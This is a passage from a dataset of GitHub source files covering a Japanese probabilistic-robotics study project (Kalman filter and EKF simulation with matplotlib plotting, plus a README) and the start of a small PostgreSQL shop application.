pass\n else :\n h_y = np.array([self.h_1(angle),self.h_2(angle),self.h_3(angle),self.h_4(angle)])\n log_P = log_P_tmp-0.5*((y-h_y)*(1/filter_R)*(y-h_y))\n print(h_y,y)\n if log_P.max() < -10:\n print(\"piyo\")\n pass\n else :\n argmax = log_P.argmax()\n if argmax == 0:\n jacobian = self.differential_1(angle)\n elif argmax == 1:\n jacobian = self.differential_2(angle)\n elif argmax == 2:\n jacobian = self.differential_3(angle)\n else :\n jacobian = self.differential_4(angle)\n kalman_gain = (self.Pxy @ 
jacobian.T) / (jacobian @ self.Pxy @ jacobian.T + filter_R)\n print(\"fuga\")\n self.x += kalman_gain.T * (y - h_y[argmax])\n self.Pxy = (1 - kalman_gain @ jacobian) * self.Pxy\n"
},
{
"alpha_fraction": 0.4538840055465698,
"alphanum_fraction": 0.5018189549446106,
"avg_line_length": 31.22758674621582,
"blob_id": "9df46573909100fdfa7fe29c956934eead2e2b2b",
"content_id": "a2e865ffc63e17b846830042b4a1c2b6e8fba03a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5055,
"license_type": "no_license",
"max_line_length": 244,
"num_lines": 145,
"path": "/sim/simulator.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport math\nimport random\n\nclass Sim:\n DT = 10 #ms\n def __init__(self,x,y,dx,dy,theta,omega):\n self.x = x #mm\n self.y = y #mm\n self.dx = dx #mm/s\n self.dy = dy #mm/s\n self.theta = theta #rad\n self.omega = omega # rad/s\n self.ddx = 0 #mm/s^2\n self.ddy = 0 #mm/s^2\n self.ep = 0 #rad/s^2\n self.b_x = 0\n self.b_y = 0\n\n def setpos(self,x,y,dx,dy,theta,omega):\n self.x = x #mm\n self.y = y #mm\n self.dx = dx #mm/s\n self.dy = dy #mm/s\n self.theta = theta #rad\n self.omega = omega # rad/s\n self.b_x = 0\n self.b_y = 0\n\n def poszero(self):\n self.setpos(0,0,0,0,0,0)\n\n def setacc(self,ddx,ddy,ep):\n self.ddx = ddx\n self.ddy = ddy\n self.ep = ep\n\n def setacczero(self):\n self.setacc(0,0,0)\n\n def update(self):\n self.b_x = self.x\n self.b_y = self.y\n self.x += (self.dx * self.DT + 0.5 * self.ddx * self.DT**2)\n self.y += (self.dy * self.DT + 0.5 * self.ddy * self.DT**2)\n self.dx += (self.ddx + (random.random() - 0.5) * 0.1) * self.DT\n self.dy += (self.ddy + (random.random() - 0.5) * 0.1) * self.DT\n self.theta += (self.omega * self.DT + 0.5 * self.ep * self.DT**2)\n self.omega += (self.ep + (random.random() - 0.5) * 0.00001) * self.DT\n\n def get_enc(self):\n return np.array([[np.cos(self.theta), -np.sin(self.theta)],[np.sin(self.theta), np.cos(self.theta)]]) @ np.array([[(self.x - self.b_x) * (1 + 0.3 * (random.random() - 0.6)), (self.y - self.b_y) * (1 + 0.3 * (random.random() - 0.4))]]).T\n\n def get_x_length(self):\n return self.x + 20 * (random.random() - 0.5)\n\n def get_y_length(self):\n return self.y + 20 * (random.random() - 0.5)\n\n def get_theta(self):\n return self.theta + 0.00000000 * (random.random() - 0.5)\n\n def get_gyro(self):\n return self.omega + (random.random() - 0.5) * 0.000001\n\n\n#x=0の柵があると過程したとき\n#angleはマシンの正面からみた角度右が正\n def get_single_wall_length(self, angle):\n field_angle = self.theta + angle\n length = -self.x / np.float64(np.sin(field_angle))\n if length < 0 or length == np.inf:\n return np.inf\n else :\n return length + (random.random() - 0.5) * 5\n\n\n#以下はx=4000, x=-4000, y= 4000, y=-4000に柵があると過程したときのもの\n#angleはマシンの正面からみた角度右が正\n def get_multi_wall_length(self,angle):\n field_angle = self.theta + angle\n ls = []\n #x = 4000\n length = (4000 - self.x) / np.float64(np.sin(field_angle))\n if length < 0 or length == np.inf:\n ls.append(np.inf)\n else :\n ls.append(length)\n #x = -4000\n length = (-4000 - self.x) / np.float64(np.sin(field_angle))\n if length < 0 or length == np.inf:\n ls.append(np.inf)\n else :\n ls.append(length)\n #y = 4000\n length = (4000 - self.y) / np.float64(np.cos(field_angle))\n if length < 0 or length == np.inf:\n ls.append(np.inf)\n else :\n ls.append(length)\n #y = -4000\n length = (-4000 - self.y) / np.float64(np.cos(field_angle))\n if length < 0 or length == np.inf:\n ls.append(np.inf)\n else :\n ls.append(length)\n\n if min(ls) == np.inf:\n return np.inf\n else:\n return min(ls) + (random.random() - 0.5) * 5\n\n # マシンの向きに対して垂直方向に12素子並んでいるラインセンサーを仮定する\n # マシンの中心から左右に素子間の距離を2mmでならんでいる\n # つまりマシン座標系で(1,0),(-1,0),(3,0),(-3,0)...とならんでいる\n # x=0(y軸)とy=0(x軸)に幅200mmの線が引かれていてそれを認識できるとする\n # またノイズとして一定の確率で正負がひっくり返ることがある\n def get_line_sensor(self):\n machine_sensor_point = np.array(\n [\n [11, 9, 7, 5, 3, 1, -1, -3, -5, -7, -9, -11],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n ]\n )\n field_sensor_point = np.array(\n [\n [np.cos(-self.theta), -np.sin(-self.theta)],\n [np.sin(-self.theta), np.cos(-self.theta)],\n ]\n ) @ 
machine_sensor_point + np.array([[self.x], [self.y]])\n data = np.random.rand(12)\n for i in range(0, len(data)):\n if (\n field_sensor_point[0][i] >= -100 and field_sensor_point[0][i] <= 100\n ) or (field_sensor_point[1][i] >= -100 and field_sensor_point[1][i] <= 100):\n data[i] -= 0.01\n else:\n data[i] -= 0.99\n if data[i] < 0:\n data[i] = 0\n else:\n data[i] = 1\n return data\n"
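\nif __name__ == '__main__':\n    # Minimal usage sketch: step the simulator a few cycles and print the\n    # noisy state (plotting is left to the drawer module).\n    sim = Sim(0., 0., 1., 1., 0., 0.)\n    sim.setacc(0., 0., 0.)\n    for _ in range(10):\n        sim.update()\n        print(sim.x, sim.y, sim.theta)\n"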
},
{
"alpha_fraction": 0.6855524182319641,
"alphanum_fraction": 0.7053824067115784,
"avg_line_length": 17.578947067260742,
"blob_id": "24780ee45330d073df78318b667c36ce18d3b2bd",
"content_id": "40663b577412731b4eeba616a3774acb4c3ed3a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 383,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 19,
"path": "/default.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n\nfrom sim import simulator\nfrom drawer import drawer\nimport numpy as np\nfrom config import config\n\ndef plot(data):\n sim.update()\n ball_img = drawer.draw_point(sim.x,sim.y)\n return ball_img\n\nsim = simulator.Sim(0.,0.,1.,1.,0.,0.) #シミュレーターのコンストラクタ\n\ndrawer = drawer.Drawing(plot)\n\nball_img = config.init(drawer)\n\ndrawer.show()\n"
},
{
"alpha_fraction": 0.46804124116897583,
"alphanum_fraction": 0.5484536290168762,
"avg_line_length": 32.44827651977539,
"blob_id": "4000efc3a64fc636c1acd7edd90e75e7393a6e88",
"content_id": "a2029057b5b23cd23c886aed79f869b19036b898",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 970,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 29,
"path": "/kf/hoge.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport math\nimport random\n\n\n\nclass Map:\n DT = 10 #ms\n def __init__(self):\n self.x = np.array([[0,0,0]])\n self.Pxy = np.array([[10,10,0.0001]])\n\n def set_pos(self, pos):\n self.x = np.array(pos)\n self.Pxy = np.array([[10,10,0.0001]])\n\n def update(self, sim):\n self.x += np.array([[0,0,sim.get_gyro() * self.DT]])\n self.x += (np.array([[np.cos(-self.x[0][2]),-np.sin(-self.x[0][2])],[np.sin(-self.x[0][2]), np.cos(-self.x[0][2])],[0,0]]) @ sim.get_enc()).T\n self.Pxy += np.array([[1600,1600,0.0001]])\n\n def update2(self, sim):\n tmp = np.array([[sim.get_x_length(), sim.get_y_length(), sim.get_theta()]]) - self.x\n tmp *= (self.Pxy / (self.Pxy + np.array([[600,600,0.000001]])))\n self.x += tmp\n self.Pxy *= (1 - (self.Pxy/(self.Pxy + np.array([[600.0,600,0.000001]]))))\n"
},
{
"alpha_fraction": 0.582587480545044,
"alphanum_fraction": 0.65500408411026,
"avg_line_length": 29.725000381469727,
"blob_id": "c39121baa0090e2a511ae56561dae7f1ac5fb614",
"content_id": "f74260672ea9a03cb9d9c2df9909b75f4b50177d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1229,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 40,
"path": "/kf_main.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nfrom sim import simulator\nfrom drawer import drawer\nimport math\nimport numpy as np\nfrom config import config\nfrom kf import hoge\n\n\ndef plot(data):\n global cnt\n cnt += 1\n simulator.update()\n kf.update(simulator)\n if cnt % 10 == 0:\n kf.update2(simulator)\n ball_img = drawer.draw_arraw(simulator.x,simulator.y, simulator.x+200*math.sin(simulator.theta), simulator.y+200*math.cos(simulator.theta))\n ball_img = drawer.draw_point(simulator.x, simulator.y)\n ball_img = drawer.draw_point(kf.x[0][0],kf.x[0][1], c='b')\n ball_img = drawer.draw_circle(kf.x[0][0],kf.x[0][1],np.sqrt(kf.Pxy[0][0]),np.sqrt(kf.Pxy[0][1]),c='g')\n ball_img = drawer.draw_arraw(kf.x[0][0],kf.x[0][1], kf.x[0][0]+200*np.sin(kf.x[0][2]), kf.x[0][1]+200*np.cos(kf.x[0][2]),\"black\")\n if abs(simulator.x) > 4000 or abs(simulator.y) > 4000 :\n drawer.stop_animation()\n return ball_img\n\ncnt = 0\n\nsimulator = simulator.Sim(0,0,0,0,0,0) #x,y,dx,dy,theta,dtheta\nsimulator.setacc(0,0,0) #ddx,ddy,ddtheta\nsimulator.setpos(-3000,-3000,5,5,-1.57,0.0000) #x,y,dx,dy,theta,dtheta\n\nkf = hoge.Map()\n\nkf.set_pos([[-3000,-3000,-1.57]])\n\ndrawer = drawer.Drawing(plot)\n\nball_img = config.init(drawer)\n\ndrawer.show()\n"
},
{
"alpha_fraction": 0.5952380895614624,
"alphanum_fraction": 0.6635944843292236,
"avg_line_length": 30.7560977935791,
"blob_id": "2f9ff823a5934b5893c56696f06df0f6862a4af3",
"content_id": "14e42e4603252a7d307e7d027582aac1d1f7a084",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1302,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 41,
"path": "/multi_model_ekf_main.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nfrom sim import simulator\nfrom drawer import drawer\nimport math\nimport numpy as np\nfrom config import config\nfrom multi_model_ekf import hoge\n\n\ndef plot(data):\n global cnt\n cnt += 1\n simulator.update()\n ekf.update(simulator)\n if cnt % 10 == 0:\n ekf.update2(simulator)\n ball_img = drawer.draw_arraw(simulator.x,simulator.y, simulator.x+200*math.sin(simulator.theta), simulator.y+200*math.cos(simulator.theta))\n ball_img = drawer.draw_point(simulator.x, simulator.y)\n ball_img = drawer.draw_point(ekf.x[0][0],ekf.x[0][1], c='b')\n ball_img = drawer.draw_circle(ekf.x[0][0],ekf.x[0][1],np.sqrt(ekf.Pxy[0][0]),np.sqrt(ekf.Pxy[1][1]),c='g')\n ball_img = drawer.draw_arraw(ekf.x[0][0],ekf.x[0][1], ekf.x[0][0]+200*np.sin(ekf.x[0][2]), ekf.x[0][1]+200*np.cos(ekf.x[0][2]),\"black\")\n #print(simulator.get_multi_wall_length(1.57))\n if abs(simulator.x) > 4000 or abs(simulator.y) > 4000 :\n drawer.stop_animation()\n return ball_img\n\ncnt = 0\n\nsimulator = simulator.Sim(0,0,0,0,0,0) #x,y,theta,dx,dy,dtheta\nsimulator.setacc(0,0,0) #ddx,ddy,ddtheta\nsimulator.setpos(-3000,-3000,5,5,0,0.0001) #x,y,theta,dx,dy,dtheta\n\nekf = hoge.Map()\n\nekf.set_pos([[-3000,-3000,0.0]])\n\ndrawer = drawer.Drawing(plot)\n\nball_img = config.init(drawer)\n\ndrawer.show()\n"
},
{
"alpha_fraction": 0.7343036532402039,
"alphanum_fraction": 0.7585616707801819,
"avg_line_length": 23.33333396911621,
"blob_id": "00eac02e118a4f46ae8616e69b7292acf1d4c463",
"content_id": "f9bab1953b287d3d9813401b0e867581c4b4205f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7132,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 144,
"path": "/README.md",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "# 確率ロボティクスの勉強\n## KF\n```\n$./kf_main.py\n```\n## Single Model EKF\n```\n$./single_ekf_main.py\n```\n## Multi Model EKF\n```\n$./multi_model_ekf_main.py\n```\n\n## 使い方\n* default.pyをコピーして同じ場所にmain.pyなどを作ってそれを変更する感じでやればいいと思います\n* 読めばわかるがplot関数内でball\\_imgに色々渡して上げればそれがプロットされます\n* 基本的にplot関数が毎周期呼ばれるので一定周期で呼ばれたいものはこの中に書きましょう\n* 柵などの最初から書かれてほしくて変化しないものはconfig/config.pyに書いてあげましょう\n* デフォルトでは-4000~4000の正方形で囲むように書かれています\n* また左下にstopボタンとresetボタンがあります\n * ストップボタンはトグルスイッチで押したらstartとstopを切り替えます\n * plot関数のループを止めます\n * resetボタンは何も実装していないので押してもなにも起こりません\n### drawer\n* drawerに用意されている関数一覧\n* まあ自分でコード読めって話だけど\n* 基本的にこれらの関数の返り値をball\\_imgに渡してあげれば良いです\n* [色一覧参考ページ](https://pythondatascience.plavox.info/matplotlib/色の名前)\n#### draw\\_point(x, y, c=\"r\", pointsize=3)\n* 引数のxとyの場所に点をプロットします\n* 第三引数と第四引数は指定しなくても大丈夫です\n* デフォルトでは赤色の大きさ3の点をプロットします\n#### draw\\_circle(x, y, x\\_diameter, y\\_diameter, c=\"b\")\n* 引数のxとyの場所に横の直径x\\_diameterの縦の直径y\\_diameterの円(楕円)をプロットします\n* デフォルトの色は青色です\n* 正確には円周をプロットします\n* 中を塗りつぶしたものは実装していません(大きい点のプロットで頑張って)\n#### draw\\_arraw(start\\_x, start\\_y, end\\_x, end\\_y, c=\"gray\")\n* 名前の通りstartの点からendの点への矢印をプロットします\n* デフォルトの色はグレーです\n* 矢印のタイプやサイズなどをいじりたかったら関数の中身を自分で書き換えてください\n#### draw\\_line(p1, p2, c=\"g\")\n* 他と統一すればよかったのですがまあ許して下さい\n* x,yの配列を渡して下さい\n* 渡された2つのポイントをつなぐ直線を引きます\n* 中身をいじれば線の太さとかも変えられます\n* デフォルトの色は緑色です\n* こんな感じで使って下さい\n```\ndraw_line([0,0], [100, 100], c=\"r\")\n```\n#### start\\_stop\\_animation\n* この関数を呼べばアニメーションが動いてたら止まり、止まってたら動きます\n* トグルスイッチです\n* アニメーションが止まるというより、plot関数のループが止まります\n#### stop\\_animation\n* この関数を呼ぶとアニメーションが止まります\n#### reset\\_animation\n* 未実装\n\n### simulator\n* simulatorに用意されている関数一覧\n* 同様に自分でコード読めって話だけど\n* 大して頭いいことしてないです\n* 自己位置推定がメインなので適当に動いてくれればいいというお気持ちです(分散結構大きいから変なふうに動くと思う)\n* x,y,thetaとそれの一回微分、二回微分を状態量として持っていて、それを毎周期更新するだけののもです\n* x,y,theta,dx,dy,omegaでアクセスできる\n\n#### \\_\\_init\\_\\_(x,y,dx,dy,theta,omega)\n* コンストラクタ\n* 初期のx,y,theta,dx,dy,omegaを引数とする\n* 一応float型で渡してあげた(0.とかにする)ほうがよい??(pythonよくわかんない)\n* 二回微分は0で初期化する\n\n#### setpos(x,y,dx,dy,theta,omega)\n* コンストラクタと同じことしかしてない\n* 同様に一応float型で渡してあげた(0.とかにする)ほうがよい??(pythonよくわかんない)\n* 二回微分は0で初期化する\n\n#### poszero()\n* setpos(0,0,0,0,0,0)を呼んでいるだけ\n\n#### setacc(ddx,ddy,ep)\n* 各成分の二回微分を指定できる\n* 電流制御のお気持ち\n* 別に速度司令で適当に動かしてもいい\n* っていうか速度司令のが直感的だし良い気がする\n\n#### update()\n* この関数を呼ぶと各状態量からdt=10msで一回更新される\n* またこのとき二回微分による一回微分の更新には適度な分散を乗せている\n* 今は一様分布だが分散の乗せ方を変えたければ中身をみて\n* 例えばこの関数をplot関数内で呼んであげればよい\n\n#### get\\_enc()\n* マシンにとってのxとyの前回周期からの変化の差分を返してくれる\n* 一様な適度な分散を乗せている\n* マシンにとってなので、フィールドにとってではないので注意\n* 返り値:np.array([[dx],[dy]])\n\n#### get\\_x\\_length()\n* マシンの自己位置のxについてある程度の一様分散を乗せてかえす\n* 返り値:float\n* 実際の世界では不可能なものだが線形なモデルのテストをしたいときに使う\n\n#### get\\_y\\_length()\n* xと同様\n\n#### get\\_theta()\n* xと同様\n* 図で言うと上方向(y軸正の方向)を0として時計回りに正としたradを返す\n\n#### get\\_gyro()\n* 状態量omegaに適当な一様分散を持たせて返してきます\n\n#### get\\_single\\_wall\\_length(angle)\n* マシン座標系でのy軸正の方向を0とした時計回りに正とした方向に測距センサーを飛ばして帰ってきた値を返す\n* x=0(y軸)の柵だけが存在するという仮定で計算されます\n* もし計算した方向に柵が存在しなかったり、極めて遠くであればnp.infを返す\n\n#### get\\_multi\\_wall\\_length(angle)\n* get\\_single\\_wall\\_length(angle)と同様\n* x=4000, x=-4000, y= 4000, y=-4000に柵があると仮定し一定の一様分散を乗せて距離を返す\n* どの柵を読んで値を返しているかはわからない\n* どの柵も読めない場合などはnp.infを返す\n\n#### get\\_line\\_sensor()\n* マシンの向きに対して垂直方向に12素子並んでいるラインセンサーを仮定する\n* その素子がラインを読んでいれば1を読んでいなければ0を返す\n* マシンの中心から左右に素子間の距離を2mmでならんでいる\n* つまりマシン座標系で(1,0),(-1,0),(3,0),(-3,0)...とならんでいる\n* x=0(y軸)とy=0(x軸)に幅200mmの線が引かれていてそれを認識できるとする\n* またノイズとして一定の確率で1,0がひっくり返ることがある\n* 返り値:np.array([(1 or 0),...])\n* 
返り値の配列はインデックス0(左から順)に(11,0),(9,0),...(-9,0),(-11,0)の素子のデータが入っている\n\n## [Lecture作り中](/lec/README.md)\n\n## 一言\n* 使い方書くの面倒くさくなった\n* そもそも使い方知りたい人いるのかなあ\n* そのうちUKFとEIFとパーティクルフィルターも実装したいね\n* ってかだれか実装してほしい\n"
},
{
"alpha_fraction": 0.5520153641700745,
"alphanum_fraction": 0.5754318833351135,
"avg_line_length": 40.349205017089844,
"blob_id": "ee0044f95d64cf7502dee57ec050d9b211cc5cb8",
"content_id": "d1504b1509b631ccd58c3f3208d8041091e8c7be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2809,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 63,
"path": "/drawer/drawer.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.patches as pat\nfrom matplotlib.widgets import Button, Slider\nimport math\n\nclass Drawing():\n def __init__(self, func):\n self.color = []\n self.fig = plt.figure()\n self.ax = self.fig.add_subplot(111)\n self.ax.set_xlim(-5000,5000)\n self.ax.set_ylim(-5000,5000)\n self.ax.set_aspect('equal')\n self.ax.set_xlabel('X [m]') \n self.ax.set_ylabel('Y [m]') \n self.ax.grid(True)\n self.stopButton = self.__createButton(0, 0, 0.15, 0.1, \"stop\", self.start_stop_animation) # (左下 x 座標, 左下 y 座標, 幅, 高さ, ラベル, バインドする函数)\n self.resetButton = self.__createButton(0, 0.1, 0.15, 0.1, \"reset\", self.reset_animation) # (左下 x 座標, 左下 y 座標, 幅, 高さ, ラベル, バインドする函数)\n self.ani = animation.FuncAnimation(self.fig, func, interval=100, frames=10)\n self.is_start = True\n\n def draw_point(self, center_x, center_y, c = \"r\", pointsize=3):#人の大きさは半径15cm\n return self.ax.plot(center_x, center_y, \".\", color=c,markersize=pointsize)\n\n\n def draw_circle(self, center_x, center_y, size_x, size_y, c = \"b\"):\n e1 = pat.Ellipse(xy = (center_x, center_y), width = size_x, height = size_y, angle = 0,fc = None, fill = False,ec = c)\n return self.ax.add_patch(e1)\n\n def draw_arraw(self,start_x,start_y,end_x,end_y,c=\"gray\"):\n return self.ax.annotate('', xy=(end_x,end_y), xytext=(start_x,start_y),\n arrowprops=dict(shrink=0, width=0.5, headwidth=2, \n headlength=2, connectionstyle='arc3',\n facecolor='gray', edgecolor=c)\n )\n\n def draw_line(self,p1,p2,c=\"g\"):\n return self.ax.plot([p1[0],p2[0]], [p1[1],p2[1]], color = c)\n\n def start_stop_animation(self,event):\n if self.is_start:\n self.ani.event_source.stop()\n self.is_start = False\n else :\n self.ani.event_source.start()\n self.is_start = True\n\n def stop_animation(self,event):\n self.ani.event_source.stop()\n\n def reset_animation(self, event):\n pass\n\n def __createButton(self, bottomLeftX, bottomLeftY, width, height, label, func):\n box = self.fig.add_axes([bottomLeftX, bottomLeftY, width, height]) # ボタン用の枠を描いて、\n button = Button(box, label) # それをボタンとして実体化して、\n button.on_clicked(func) # クリックされたときに実行する函数をバインドする。\n return button\n\n def show(self):\n plt.show()\n"
},
{
"alpha_fraction": 0.5258620977401733,
"alphanum_fraction": 0.6034482717514038,
"avg_line_length": 13.5,
"blob_id": "9d8b8fb1d7575a9384a3b06d02989501aed92215",
"content_id": "eacdde089f2eac0a348a1d0e89be732b188eb681",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 8,
"path": "/test.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "import math\nimport numpy as np\n\nx = np.array([[10,10,10]])\ny = np.array([[1,0,0]])\nprint(x)\nprint(y)\nprint(x.T @ y)\n"
}
] | 12 |
yura-seredyuk/shop_app
|
https://github.com/yura-seredyuk/shop_app
|
b58c84609bac6b31749413ad0d62f28b54c7ee1e
|
5ddab6cf3052932761081aaceafe12d7237311ce
|
e80f88531532824da25f4b32a4f04407bb4f5e6a
|
refs/heads/master
| 2023-09-04T11:58:13.704692 | 2021-11-03T16:01:27 | 2021-11-03T16:01:27 | 386,386,579 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5635507702827454,
"alphanum_fraction": 0.5716207027435303,
"avg_line_length": 23.344263076782227,
"blob_id": "3071280911a114e07e1cf4f37c5cfe31e8685b78",
"content_id": "d0339d49797d5ad287abd59dc4bef9206d435606",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1487,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 61,
"path": "/employee.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom settings import *\nfrom connection import Connection\n\n\nclass Employee(Connection):\n\n def __init__(self, login, password):\n self.login = login\n self.password = password\n\n\n def register_self(self):\n pass\n\n def get_order_info(self, selector = ''):\n table = ('orders',)\n fields = ('*',)\n selector = ''\n result = self.getData(table, fields, selector)\n return result\n\n def add_pr_category(self, data):\n table = 'product_category'\n result = self._postData(table, data)\n return result\n\n def edit_pr_category(self, data, selector):\n table = 'product_category'\n result = self.updateData(table, data, selector)\n return result\n\n def delete_pr_category(self, selector):\n table = 'product_category'\n selector = f\"category_name = '{selector}'\"\n result = self.deleteData(table,selector)\n return result\n\n\n\nif __name__ == '__main__':\n\n admin1 = Employee('Admin1', '1234')\n # orders = admin1.get_order_info()\n # print(orders)\n data = [{\n 'category_name': \"Beer\"\n },\n ]\n put = admin1.add_pr_category(data)\n print(put)\n # data = {\n # 'category_name': \"Water\"\n # }\n # edit = admin1.edit_pr_category(data, \"category_name = 'Rom'\")\n # print(edit)\n # id = admin1.getNextId('product_category')\n # print(id)\n\n # dele = admin1.delete_pr_category('Beer')\n # print(dele)\n\n\n"
},
{
"alpha_fraction": 0.7183462381362915,
"alphanum_fraction": 0.7260981798171997,
"avg_line_length": 31.33333396911621,
"blob_id": "40387da96ff94c285ee79268d3027c9de04fe475",
"content_id": "4aa7ff7038f9f54f673a3100cf005ce4d80f2e2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 387,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 12,
"path": "/create.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT\nfrom settings import *\n\nconnection = psycopg2.connect(user = USER, password = PASSWORD,\n host = HOST, port = PORT)\nconnection.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n\ncursor = connection.cursor()\ncursor.execute(\"CREATE DATABASE shop_db\")\ncursor.close()\nconnection.close()"
},
{
"alpha_fraction": 0.4998602271080017,
"alphanum_fraction": 0.5076879858970642,
"avg_line_length": 38.28571319580078,
"blob_id": "d5f444e491cabdeef8799b65bc8b48cd6e75dd28",
"content_id": "0c7c11f7d80ce3e0cfb156f2353b6341881b4b22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3577,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 91,
"path": "/customer.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom settings import *\nfrom connection import Connection\nfrom datetime import datetime\n\nclass Customer(Connection):\n\n def __init__(self, login, password):\n self.login = login\n self.password = password\n self.first_name = ''\n self.last_name = ''\n self.city_id = ''\n self.id = ''\n\n def register_self(self,first_name, last_name, city ):\n self.register( self.login, self.password, 'cus')\n data=[{\n 'city_id': city,\n 'first_name': first_name,\n 'last_name': last_name,\n 'reg_id': self.getNextId('reg_base')-1\n }]\n self._postData('customer', data)\n \n def login_self(self):\n id = self.login_check(self.login,self.password, 'cus')\n if id:\n self.first_name = self.getData(('customer',),('first_name',),f\"where reg_id = {id}\")[0][0]\n self.last_name = self.getData(('customer',),('last_name',),f\"where reg_id = {id}\")[0][0]\n self.city_id = self.getData(('customer',),('city_id',),f\"where reg_id = {id}\")[0][0]\n self.id = self.getData(('customer',),('id',),f\"where reg_id = {id}\")[0][0]\n # print(self.first_name, self.last_name, self.city_id)\n return True\n return False\n\n def get_order_info(self, category = '', selector = '', ):\n \"\"\"\n category must be one of the item from the list:\n ['city_name','date_of_order', 'product_name']\n\n date format for selector: 2020-6-12\n \"\"\"\n if self.login_self():\n categoryes = ['city_name','date_of_order', 'product_name']\n table = ('orders o',)\n fields = (\"\"\"o.id, concat(e.first_name,' ', e.last_name) as \"employee\", c.city_name, o.date_of_order, concat(c2.first_name,' ', c2.last_name) as \"customer\", p.product_name, o.price \"\"\",)\n if category and category in categoryes and selector:\n where = f\"\"\"where {category} = '{selector}'\"\"\"\n else:\n where = ''\n selector = f\"\"\" inner JOIN employee e on e.id = o.employee_id \n inner JOIN city c on c.id = o.city_id \n inner JOIN customer c2 on c2.id = o.customer_id \n inner JOIN product p on p.id = o.product_id {where}\"\"\"\n result = self.getData(table, fields, selector)\n fieldNames = [\"id\", \"employee\", \"city_name\",\"date_of_order\", \"customer\", \"product_name\", \"price\" ]\n changeRes = []\n for item in result:\n cort = {}\n for index,element in enumerate(item):\n cort[fieldNames[index]]=element\n changeRes.append(cort)\n else:\n changeRes = \"Invalid loging!\"\n return changeRes\n\n\n\n def create_order(self, products):\n if self.login_self():\n table = 'orders'\n data = []\n for item in products:\n order = {\n \"customer_id\": self.id,\n \"city_id\": self.city_id,\n \"date_of_order\": datetime.today().strftime('%Y-%m-%d'),\n \"product_id\": self.getData(('product',),('id',),f\"where product_name = '{item[0]}'\")[0][0],\n \"price\": self.getData(('product',),('unit_price',),f\"where product_name = '{item[0]}'\")[0][0] * item[1]\n }\n data.append(order)\n result = self._postData(table, data)\n return result\n\n\n\n\n\nif __name__ == '__main__':\n pass\n\n\n"
},
{
"alpha_fraction": 0.6745283007621765,
"alphanum_fraction": 0.6839622855186462,
"avg_line_length": 26.66666603088379,
"blob_id": "b7e67d56372430578b13c2d5aa5046cd7d7cd0c4",
"content_id": "953fbaaecca62e7b638742de92c89b26f1ca6d0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1908,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 69,
"path": "/add_tables.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
